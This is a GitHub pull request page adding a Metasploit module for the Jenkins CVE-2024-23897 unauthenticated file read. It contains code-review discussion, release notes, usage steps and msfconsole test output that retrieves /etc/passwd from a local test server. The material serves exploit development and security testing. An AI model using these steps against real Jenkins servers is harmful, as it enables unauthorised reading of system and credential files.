initial POC for jenkins CVE-2024-23897 (unauth arbitrary file read) #18764
Conversation
| }, | ||
| 'DefaultOptions' => { | ||
| 'RPORT' => 8080, | ||
| 'HttpClientTimeout' => 3 # very quick response, so set this low |
There was a problem hiding this comment.
The responses normally do return quickly, is it necessary to adjust the timeout? Seems like it'd be necessary if HTTP requests were often timing out during the course of exploitation.
There was a problem hiding this comment.
When I was still learning the protocol, any error would cause a crash server side and no response would be received. While I believe I've stabilized out the code to not crash the server, it felt like a good thing to keep in just in case there's a gotcha
modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb
Outdated
Show resolved
Hide resolved
modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb
Outdated
Show resolved
Hide resolved
modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb
Outdated
Show resolved
Hide resolved
modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb
Outdated
Show resolved
Hide resolved
modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb
Outdated
Show resolved
Hide resolved
|
@msjenkins-r7 test this please |
There was a problem hiding this comment.
Nice one @h00die!! A couple minor comments after doing some testing but overall looks great.
Testing with the suggested changes on LTS Version 2.426.2:
msf6 auxiliary(gather/jenkins_cli_ampersand_arbitrary_file_read) > options
Module options (auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read):
Name Current Setting Required Description
---- --------------- -------- -----------
FILE_PATH /etc/passwd yes File path to read from the server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path for Jenkins
VHOST no HTTP server virtual host
View the full module info with the info, or info -d command.
msf6 auxiliary(gather/jenkins_cli_ampersand_arbitrary_file_read) > run
[*] Running module against 127.0.0.1
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Found exploitable version: 2.426.2
[*] Sending requests with UUID: da8d3337-2414-43ad-92ab-8cacb7900cdf
[+] /etc/passwd file contents retrieved (first line or 2):
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
[+] Results saved to: /Users/jheysel/.msf4/loot/20240326174542_default_127.0.0.1_jenkins.file_685766.txt
[*] Auxiliary module execution completed
modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb
Outdated
Show resolved
Hide resolved
There was a problem hiding this comment.
My apologies @h00die, my first set of suggestions fixed the module but I didn't realize they were going to break rubocop. This set of suggestions fixes the module while satisfying rubocop rules.
You were correct with your method definitions:
def data_generator(pad: false)
its just when calling a method defined like the above you have to specify the default variable explicitly like so:
data_generator(pad: multi_line_file)
Testing with the latest suggestions:
msf6 auxiliary(gather/jenkins_cli_ampersand_arbitrary_file_read) > rexploit
[*] Reloading module...
[*] Running module against 127.0.0.1
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Found exploitable version: 2.426.2
[*] Sending requests with UUID: 13be74e5-8a16-4431-aa1c-fdb767edc6ff
[+] /etc/passwd file contents retrieved (first line or 2):
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
[+] Results saved to: /Users/jheysel/.msf4/loot/20240328124555_default_127.0.0.1_jenkins.file_769324.txt
[*] Auxiliary module execution completed
modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb
Outdated
Show resolved
Hide resolved
modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb
Outdated
Show resolved
Hide resolved
modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb
Outdated
Show resolved
Hide resolved
modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb
Outdated
Show resolved
Hide resolved
modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb
Outdated
Show resolved
Hide resolved
jheysel-r7
closed this pull request by merging all changes
into
rapid7:master
in
31cf0e2
Release NotesThis PR adds a new module to exploit CVE-2024-23897, an unauthorized arbitrary (first 2 lines) file read on Jenkins versions prior to 2.442 or for the LTS stream, versions prior to 2.426.3. |
jheysel-r7
added
the
rn-modules
|
Thanks for handling this @jheysel-r7 |
This PR adds a new module to exploit CVE-2024-23897 , an unauth arbitrary (first 2 lines) file read on Jenkins.
All of the python PoCs I reviewed (all linked in module) aren't very good. While they work for
/etc/passwd, they only pull files w/ multiple lines and only with a file name length of 11 since the string length is hardcoded. I know its too late, but shoutout to @acammack-r7 back on #13741 (review) for opening my eyes to this kind of thing.This PoC works with files that have 1 line, or multiple lines, adds check and error handling, so I believe its good to go now.
use auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_readset rhost [ip]runFILE_PATH